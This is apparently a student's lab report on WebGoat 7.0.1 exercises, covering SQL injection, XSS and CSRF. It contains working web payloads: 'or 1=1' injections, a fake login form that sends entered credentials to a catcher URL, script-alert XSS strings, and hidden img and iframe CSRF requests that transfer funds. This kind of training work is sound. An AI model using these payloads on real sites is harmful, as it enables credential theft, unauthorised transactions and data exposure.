实验目标
做不少于7个题目
基础问题
<i>SQL注入攻击原理,如何防御
指的是通过构建特殊的输入作为参数传入Web应用程序,而这些输入大都是SQL语法里的一些组合,通过执行SQL语句进而执行攻击者所要的操作,使非法数据侵入系统。
1.对输入的数据进行过滤,过滤掉敏感字符。加密数据库
2.在PHP配置文件中Register_globals=off;设置为关闭状态,作用将注册全局变量关闭
3.提高数据库命名技巧,对于一些重要的字段根据程序的特点命名
4.开启PHP安全模式
5.采取辅助软件或网站平台来检测sql注入
<ii>XSS攻击的原理,如何防御
攻击者利用网站漏洞,输入可以显示在页面上的、对其他用户造成影响的HTML代码;由于受害者浏览器对目标服务器的信任,当其访问目标服务器上被注入恶意脚本的页面后,这段恶意脚本可以顺利执行,实现获取用户cookie并可以利用用户身份进行非法操作的目的。
1.在服务器段限制输入格式,输入类型,输入长度以及输入字符
2.要注意避免使用一些有潜在危险的html标签,这些标签很容易嵌入一些恶意网页代码
3.对所有用户提交内容进行可靠的输入验证,包括对URL、查询关键字、HTTP头、POST数据等,仅接受指定长度范围内、采用适当格式、采用所预期的字符的内容提交,对其他的一律过滤
<iii>CSRF攻击原理,如何防御
CSRF(Cross-site request forgery)跨站请求伪造,也被称为“One Click Attack”或者Session Riding,通常缩写为CSRF或者XSRF,是一种对网站的恶意利用。尽管听起来像跨站脚本(XSS),但它与XSS非常不同,XSS利用站点内的信任用户,而CSRF则通过伪装来自受信任用户的请求来利用受信任的网站。与XSS攻击相比,CSRF攻击往往不大流行(因此对其进行防范的资源也相当稀少)和难以防范,所以被认为比XSS更具危险性。通过伪装来自受信任用户的请求来利用受信任的网站。是一种依赖web浏览器的、被混淆过的代理人攻击。
用户在浏览其它站点前登出站点;在浏览器会话结束后清理浏览器的cookie;尽量不要在页面的链接中暴露用户隐私信息;避免全站通用的cookie,严格设置cookie的域。
实验内容
1.wegoat安装
<i>进入网站https://github.com/WebGoat/WebGoat/releases/tag/7.0.1下载webgoat
<ii>kali输入netstat -tupln | grep 8080查看WebGoat默认使用8080端口是否被占用
<iii>输入java -jar webgoat-container-7.0.1-war-exec.jar开启WebGoat
<iv>浏览器访问localhost:8080/WebGoat
<v>下载jdk文件并解压,具体参考https://www.jianshu.com/p/9ec7838411c8
<vi>重启webgoat,发现有了菜单栏
2.SQL注入攻击(命令)
<i>在菜单栏选择 Injection Flaws-->Command Injection,右键选择Inspect Element审查网页元素对源代码option进行修改
<ii>查看网络端口使用情况和IP地址
3.Numeric SQL Injection
<i>在菜单栏选择 Injection Flaws-->Numeric SQL Injection,右键选择Inspect Element审查网页元素对源代码option进行修改,在选中的城市编号value="101"后添加or 1=1
<ii>选择columbia,单击GO,查看天气
4.string SQL Injection(字符串型注入)
<i>使用提前闭合,插入永真式1=1
<ii>输入yb' or 1=1--select查询表里面的所有数据
5.Phishing with XSS (跨站脚本钓鱼攻击)
<i>创建一个form要求填写用户名和密码将数据再提交到黑客
<head>
<body>
<div>
<div style="float:left;height:100px;50%;background-color:green;"></div>
<div style="float:left;height:100px;50%;background-color:red;"></div>
</div>
<div style="background-color:blue;height:200px;clear:both;"></div>
</div></div>
</form>
<script>
function hack(){
XSSImage=new Image;
XSSImage.src="http://localhost:8080/WebGoat/catcher?PROPERTY=yes&user=" + document.phish.user.value + "&password=" + document.phish.pass.value + "";
alert("attack.!!!!!! Your credentials were just stolen. User Name = " + document.phish.user.value + " Password = " + document.phish.pass.value);
}
</script>
<form name="phish">
<br>
<br>
<HR>
<H2>This feature requires account login:</H2>
<br>
<br>Enter Username:<br>
<input type="text" name="user">
<br>Enter Password:<br>
<input type="password" name = "pass">
<br>
<input type="submit" name="login" value="login" onclick="hack()">
</form>
<br>
<br>
<HR>
</body>
</head>
输入完成后点击Search按钮执行,结果会出现两个输入框,分别名为Enter Username和Enter Password。所以钓鱼就是在这俩输入框里输入的信息都会被钓走,被人窃取。
6.存储型XSS攻击(Stored XSS Attacks)
<i>输入<script>alert("You've been attacked!20174325aliengirlyz");</script>,攻击成功。
7.反射型XSS攻击(Reflected XSS Attacks)
<i>在Enter your three digit access code中输入代码<script>alert("You've been attacked!!20174325aliengirlyz");</script>,点击purchase的同时页面就给出了反馈
8.跨站请求伪造(Cross Site Request Forgery (CSRF))
<i>查看Parameters中的src和menu值
<ii>在title中输入参数20174325
<iii>message框中输入<img src="http://localhost:8080/WebGoat/attack?Screen=496&menu=900&transferFunds=5000" width="1" height="1" />以图片的的形式将URL放进Message框,设置高度和宽度的目的是为了隐藏该图片,这时的URL对其他用户是不可见的,用户一旦点击图片,就会触发一个CSRF事件,点击Submit提交
<iv>在Message List中生成链接20174325
当前页面下载并显示此消息,转走用户的5000元,从而达到CSRF攻击的目的。
9.绕过 CSRF 确认( CSRF Prompt By‐Pass)
<i>查看Parameters中的src和menu值
<ii>title输入20174325
<iii>message输入
<iframe src="attack?Screen=531&menu=900&transferFunds=5000"> </iframe>
<iframe src="attack?Screen=531&menu=900&transferFunds=CONFIRM"> </iframe>
<iv>进入massage list生成的链接20174325
攻击成功。
实验体会
这是本学期的最后一次实验,因为家里的一些原因所以回了老家也因此晚交了实验,但此次实验的体会不光就实验吧,这学期对于网络对抗课程的学习,让我对于网络上的一些操作和了解更加深入了,原来以前一直觉得很复杂的事情操作起来这么简单,原来以前一直觉得不可能的事情也这么轻易,对于以后生活中的安全防范意识也有了更大的提升,总的来说,这学期的网络对抗学习对我而言收获颇丰。